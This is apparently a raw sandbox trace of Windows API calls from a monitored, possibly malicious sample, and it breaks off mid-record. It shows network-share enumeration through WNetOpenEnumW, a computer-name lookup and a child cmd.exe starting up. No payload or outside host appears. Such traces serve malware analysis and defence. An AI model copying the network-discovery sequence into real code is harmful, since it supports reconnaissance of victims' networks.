0x998 Thread: id = 8 os_tid = 0x99c [0039.167] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x21a) returned 0x747790 [0039.167] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x28) returned 0x8755b8 [0039.167] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x9c [0039.167] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0 [0039.167] GetComputerNameW (in: lpBuffer=0x7477a0, nSize=0xfeff70 | out: lpBuffer="XDUWTFONO", nSize=0xfeff70) returned 1 [0039.168] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x26) returned 0x8755e8 [0039.168] GetLastError () returned 0xcb [0039.168] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x214) returned 0x7479b8 [0039.168] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0039.168] GetCurrentThreadId () returned 0x99c [0039.169] SetLastError (dwErrCode=0xcb) [0039.169] GetLastError () returned 0xcb [0039.169] SetLastError (dwErrCode=0xcb) [0039.169] GetLastError () returned 0xcb [0039.169] SetLastError (dwErrCode=0xcb) [0039.169] GetLastError () returned 0xcb [0039.169] SetLastError (dwErrCode=0xcb) [0039.169] GetLastError () returned 0xcb [0039.169] SetLastError (dwErrCode=0xcb) [0039.169] GetLastError () returned 0xcb [0039.169] SetLastError (dwErrCode=0xcb) [0039.169] GetLastError () returned 0xcb [0039.170] SetLastError (dwErrCode=0xcb) [0039.170] GetLastError () returned 0xcb [0039.170] SetLastError (dwErrCode=0xcb) [0039.170] GetLastError () returned 0xcb [0039.170] SetLastError (dwErrCode=0xcb) [0039.170] GetLastError () returned 0xcb [0039.170] SetLastError (dwErrCode=0xcb) [0039.170] GetLastError () returned 0xcb [0039.170] SetLastError (dwErrCode=0xcb) [0039.170] GetLastError () returned 0xcb [0039.170] SetLastError (dwErrCode=0xcb) [0039.170] GetLastError () returned 0xcb [0039.170] SetLastError (dwErrCode=0xcb) [0039.170] GetLastError () returned 0xcb [0039.171] SetLastError (dwErrCode=0xcb) [0039.171] GetLastError () returned 0xcb [0039.171] SetLastError (dwErrCode=0xcb) [0039.171] GetLastError () returned 0xcb [0039.171] SetLastError (dwErrCode=0xcb) [0039.171] GetLastError () returned 0xcb [0039.171] SetLastError (dwErrCode=0xcb) [0039.171] GetLastError () returned 0xcb [0039.171] SetLastError (dwErrCode=0xcb) [0039.171] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x4000) returned 0x747f40 [0039.172] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10000) returned 0x74bf48 [0039.172] WNetOpenEnumW (in: dwScope=0x1, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0xfeff34 | out: lphEnum=0xfeff34*=0x23a7b8) returned 0x0 [0041.984] WNetEnumResourceW (in: hEnum=0x23a7b8, lpcCount=0xfeff3c, lpBuffer=0x747f40, lpBufferSize=0xfeff2c | out: lpcCount=0xfeff3c, lpBuffer=0x747f40, lpBufferSize=0xfeff2c) returned 0x103 [0041.984] WNetCloseEnum (hEnum=0x23a7b8) returned 0x0 [0041.984] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x747f40 | out: hHeap=0x870000) returned 1 [0041.984] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x74bf48 | out: hHeap=0x870000) returned 1 [0041.984] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x4000) returned 0x747f40 [0041.984] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10000) returned 0x74bf48 [0041.984] WNetOpenEnumW (in: dwScope=0x4, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0xfeff1c | out: lphEnum=0xfeff1c*=0x227db0) returned 0x0 [0041.985] WNetEnumResourceW (in: hEnum=0x227db0, lpcCount=0xfeff24, lpBuffer=0x747f40, lpBufferSize=0xfeff14 | out: lpcCount=0xfeff24, lpBuffer=0x747f40, lpBufferSize=0xfeff14) returned 0x103 [0041.985] WNetCloseEnum (hEnum=0x227db0) returned 0x0 [0041.985] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x747f40 | out: hHeap=0x870000) returned 1 [0041.985] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x74bf48 | out: hHeap=0x870000) returned 1 [0041.985] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x4000) returned 0x747f40 [0041.985] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x10000) returned 0x74bf48 [0041.985] WNetOpenEnumW (dwScope=0x5, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0xfeff04) Thread: id = 9 os_tid = 0x9a0 Thread: id = 10 os_tid = 0x9a4 Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0xa9b000" os_pid = "0x9b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x96c" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 13 os_tid = 0x9bc [0046.631] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfd70 | out: lpSystemTimeAsFileTime=0x2cfd70*(dwLowDateTime=0xf18a1a00, dwHighDateTime=0x1d4f17e)) [0046.631] GetCurrentProcessId () returned 0x9b8 [0046.631] GetCurrentThreadId () returned 0x9bc [0046.631] GetTickCount () returned 0x1b54a [0046.631] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfd78 | out: lpPerformanceCount=0x2cfd78*=16643977667) returned 1 [0046.632] GetModuleHandleW (lpModuleName=0x0) returned 0x4a490000 [0046.632] __set_app_type (_Type=0x1) [0046.632] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4b7810) returned 0x0 [0046.632] __getmainargs (in: _Argc=0x4a4da608, _Argv=0x4a4da618, _Env=0x4a4da610, _DoWildCard=0, _StartInfo=0x4a4be0f4 | out: _Argc=0x4a4da608, _Argv=0x4a4da618, _Env=0x4a4da610) returned 0 [0046.632] GetCurrentThreadId () returned 0x9bc [0046.632] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9bc) returned 0x3c [0046.633] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0046.633] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0046.633] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0046.633] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0046.633] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfd08 | out: phkResult=0x2cfd08*=0x0) returned 0x2 [0046.633] VirtualQuery (in: lpAddress=0x2cfcf0, lpBuffer=0x2cfc70, dwLength=0x30 | out: lpBuffer=0x2cfc70*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.633] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfc70, dwLength=0x30 | out: lpBuffer=0x2cfc70*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.633] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfc70, dwLength=0x30 | out: lpBuffer=0x2cfc70*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.633] VirtualQuery (in: lpAddress=0x1d4000, lpBuffer=0x2cfc70, dwLength=0x30 | out: lpBuffer=0x2cfc70*(BaseAddress=0x1d4000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.633] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfc70, dwLength=0x30 | out: lpBuffer=0x2cfc70*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.633] GetConsoleOutputCP () returned 0x1b5 [0046.634] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4cbfe0 | out: lpCPInfo=0x4a4cbfe0) returned 1 [0046.634] SetConsoleCtrlHandler (HandlerRoutine=0x4a4b3184, Add=1) returned 1 [0046.634] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.634] SetConsoleMode (hConsoleHandle=0xfc, dwMode=0x0) returned 0 [0046.696] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.696] GetConsoleMode (in: hConsoleHandle=0xfc, lpMode=0x4a4be194 | out: lpMode=0x4a4be194) returned 0 [0046.696] _get_osfhandle (_FileHandle=0) returned 0x98 [0046.696] GetConsoleMode (in: hConsoleHandle=0x98, lpMode=0x4a4be198 | out: lpMode=0x4a4be198) returned 0 [0046.696] GetEnvironmentStringsW () returned 0x488a60* [0046.697] GetProcessHeap () returned 0x470000 [0046.697] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa7c) returned 0x4894f0 [0046.697] FreeEnvironmentStringsW (penv=0x488a60) returned 1 [0046.697] GetProcessHeap () returned 0x470000 [0046.697] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x8) returned 0x4888e0 [0046.697] GetEnvironmentStringsW () returned 0x488a60* [0046.697] GetProcessHeap () returned 0x470000 [0046.697] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa7c) returned 0x489f80 [0046.697] FreeEnvironmentStringsW (penv=0x488a60) returned 1 [0046.697] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cebc8 | out: phkResult=0x2cebc8*=0x44) returned 0x0 [0046.697] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cebc0, lpData=0x2cebe0, lpcbData=0x2cebc4*=0x1000 | out: lpType=0x2cebc0*=0x0, lpData=0x2cebe0*=0x18, lpcbData=0x2cebc4*=0x1000) returned 0x2 [0046.697] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cebc0, lpData=0x2cebe0, lpcbData=0x2cebc4*=0x1000 | out: lpType=0x2cebc0*=0x4, lpData=0x2cebe0*=0x1, lpcbData=0x2cebc4*=0x4) returned 0x0 [0046.698] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cebc0, lpData=0x2cebe0, lpcbData=0x2cebc4*=0x1000 | out: lpType=0x2cebc0*=0x0, lpData=0x2cebe0*=0x1, lpcbData=0x2cebc4*=0x1000) returned 0x2 [0046.698] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cebc0, lpData=0x2cebe0, lpcbData=0x2cebc4*=0x1000 | out: lpType=0x2cebc0*=0x4, lpData=0x2cebe0*=0x0, lpcbData=0x2cebc4*=0x4) returned 0x0 [0046.698] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cebc0, lpData=0x2cebe0, lpcbData=0x2cebc4*=0x1000 | out: lpType=0x2cebc0*=0x4, lpData=0x2cebe0*=0x40, lpcbData=0x2cebc4*=0x4) returned 0x0 [0046.698] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cebc0, lpData=0x2cebe0, lpcbData=0x2cebc4*=0x1000 | out: lpType=0x2cebc0*=0x4, lpData=0x2cebe0*=0x40, lpcbData=0x2cebc4*=0x4) returned 0x0 [0046.698] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cebc0, lpData=0x2cebe0, lpcbData=0x2cebc4*=0x1000 | out: lpType=0x2cebc0*=0x0, lpData=0x2cebe0*=0x40, lpcbData=0x2cebc4*=0x1000) returned 0x2 [0046.698] RegCloseKey (hKey=0x44) returned 0x0 [0046.698] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cebc8 | out: phkResult=0x2cebc8*=0x44) returned 0x0 [0046.698] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cebc0, lpData=0x2cebe0, lpcbData=0x2cebc4*=0x1000 | out: lpType=0x2cebc0*=0x0, lpData=0x2cebe0*=0x40, lpcbData=0x2cebc4*=0x1000) returned 0x2 [0046.698] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cebc0, lpData=0x2cebe0, lpcbData=0x2cebc4*=0x1000 | out: lpType=0x2cebc0*=0x4, lpData=0x2cebe0*=0x1, lpcbData=0x2cebc4*=0x4) returned 0x0 [0046.698] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cebc0, lpData=0x2cebe0, lpcbData=0x2cebc4*=0x1000 | out: lpType=0x2cebc0*=0x0, lpData=0x2cebe0*=0x1, lpcbData=0x2cebc4*=0x1000) returned 0x2 [0046.698] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cebc0, lpData=0x2cebe0, lpcbData=0x2cebc4*=0x1000 | out: lpType=0x2cebc0*=0x4, lpData=0x2cebe0*=0x0, lpcbData=0x2cebc4*=0x4) returned 0x0 [0046.698] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cebc0, lpData=0x2cebe0, lpcbData=0x2cebc4*=0x1000 | out: lpType=0x2cebc0*=0x4, lpData=0x2cebe0*=0x9, lpcbData=0x2cebc4*=0x4) returned 0x0 [0046.698] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cebc0, lpData=0x2cebe0, lpcbData=0x2cebc4*=0x1000 | out: lpType=0x2cebc0*=0x4, lpData=0x2cebe0*=0x9, lpcbData=0x2cebc4*=0x4) returned 0x0 [0046.698] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cebc0, lpData=0x2cebe0, lpcbData=0x2cebc4*=0x1000 | out: lpType=0x2cebc0*=0x0, lpData=0x2cebe0*=0x9, lpcbData=0x2cebc4*=0x1000) returned 0x2 [0046.698] RegCloseKey (hKey=0x44) returned 0x0 [0046.698] time (in: timer=0x0 | out: timer=0x0) returned 0x5cb110de [0046.698] srand (_Seed=0x5cb110de) [0046.698] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0046.698] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0046.699] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4cc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.699] GetProcessHeap () returned 0x470000 [0046.699] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x218) returned 0x48aa10 [0046.699] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x48aa20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0046.699] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.699] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.699] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0046.699] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0046.699] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0046.699] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0046.699] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0046.699] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0046.699] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0046.699] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0046.699] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0046.699] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0046.699] GetProcessHeap () returned 0x470000 [0046.699] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4894f0 | out: hHeap=0x470000) returned 1 [0046.700] GetEnvironmentStringsW () returned 0x488a60* [0046.700] GetProcessHeap () returned 0x470000 [0046.700] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa94) returned 0x48ac30 [0046.700] FreeEnvironmentStringsW (penv=0x488a60) returned 1 [0046.700] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.700] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0046.700] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0046.700] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0046.700] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0046.700] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0046.700] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0046.700] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0046.700] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0046.700] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0046.700] GetProcessHeap () returned 0x470000 [0046.700] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x5c) returned 0x48b6d0 [0046.700] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf9d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.701] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf9d0, lpFilePart=0x2cf9b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf9b0*="Desktop") returned 0x25 [0046.701] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.701] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf6e0 | out: lpFindFileData=0x2cf6e0) returned 0x48b740 [0046.701] FindClose (in: hFindFile=0x48b740 | out: hFindFile=0x48b740) returned 1 [0046.701] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2cf6e0 | out: lpFindFileData=0x2cf6e0) returned 0x48b740 [0046.701] FindClose (in: hFindFile=0x48b740 | out: hFindFile=0x48b740) returned 1 [0046.701] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0046.701] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2cf6e0 | out: lpFindFileData=0x2cf6e0) returned 0x48b740 [0046.701] FindClose (in: hFindFile=0x48b740 | out: hFindFile=0x48b740) returned 1 [0046.701] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.701] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0046.701] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0046.702] GetProcessHeap () returned 0x470000 [0046.702] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48ac30 | out: hHeap=0x470000) returned 1 [0046.702] GetEnvironmentStringsW () returned 0x48b740* [0046.702] GetProcessHeap () returned 0x470000 [0046.702] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xae8) returned 0x48c230 [0046.702] FreeEnvironmentStringsW (penv=0x48b740) returned 1 [0046.702] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4cc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.702] GetProcessHeap () returned 0x470000 [0046.702] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48b6d0 | out: hHeap=0x470000) returned 1 [0046.702] GetProcessHeap () returned 0x470000 [0046.702] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4016) returned 0x48cd20 [0046.702] GetProcessHeap () returned 0x470000 [0046.702] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48cd20 | out: hHeap=0x470000) returned 1 [0046.702] GetConsoleOutputCP () returned 0x1b5 [0046.705] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4cbfe0 | out: lpCPInfo=0x4a4cbfe0) returned 1 [0046.705] GetUserDefaultLCID () returned 0x409 [0046.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a4c7b50, cchData=8 | out: lpLCData=":") returned 2 [0046.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfae0, cchData=128 | out: lpLCData="0") returned 2 [0046.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfae0, cchData=128 | out: lpLCData="0") returned 2 [0046.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfae0, cchData=128 | out: lpLCData="1") returned 2 [0046.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a4da740, cchData=8 | out: lpLCData="/") returned 2 [0046.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a4da4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0046.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a4da460, cchData=32 | out: lpLCData="Tue") returned 4 [0046.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a4da420, cchData=32 | out: lpLCData="Wed") returned 4 [0046.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a4da3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0046.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a4da3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0046.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a4da360, cchData=32 | out: lpLCData="Sat") returned 4 [0046.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a4da700, cchData=32 | out: lpLCData="Sun") returned 4 [0046.706] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a4c7b40, cchData=8 | out: lpLCData=".") returned 2 [0046.706] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a4da4e0, cchData=8 | out: lpLCData=",") returned 2 [0046.706] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0046.707] GetProcessHeap () returned 0x470000 [0046.707] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20c) returned 0x4895c0 [0046.707] GetConsoleTitleW (in: lpConsoleTitle=0x4895c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.711] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.711] GetFileType (hFile=0xfc) returned 0x3 [0046.711] BrandingFormatString () returned 0x4897e0 [0046.728] GetVersion () returned 0x1db10106 [0046.728] _vsnwprintf (in: _Buffer=0x2cfc50, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x2cfbe8 | out: _Buffer="6.1.7601") returned 8 [0046.728] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.728] GetFileType (hFile=0xfc) returned 0x3 [0046.728] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a4d6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0046.728] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a4d6340, nSize=0x2000, Arguments=0x2cfbf0 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0046.728] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.728] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37 [0046.728] WriteFile (in: hFile=0xfc, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x2cfb78, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x2cfb78*=0x24, lpOverlapped=0x0) returned 1 [0046.728] _vsnwprintf (in: _Buffer=0x4a4d6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cfc18 | out: _Buffer="\r\n") returned 2 [0046.728] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.728] GetFileType (hFile=0xfc) returned 0x3 [0046.729] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.729] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0046.729] WriteFile (in: hFile=0xfc, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cfbe8, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x2cfbe8*=0x2, lpOverlapped=0x0) returned 1 [0046.729] _vsnwprintf (in: _Buffer=0x4a4d6340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x2cfc18 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0046.729] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.729] GetFileType (hFile=0xfc) returned 0x3 [0046.729] _get_osfhandle (_FileHandle=1) returned 0xfc [0046.729] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 64 [0046.729] WriteFile (in: hFile=0xfc, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x2cfbe8, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x2cfbe8*=0x3f, lpOverlapped=0x0) returned 1 [0046.729] _vsnwprintf (in: _Buffer=0x4a4d6340, 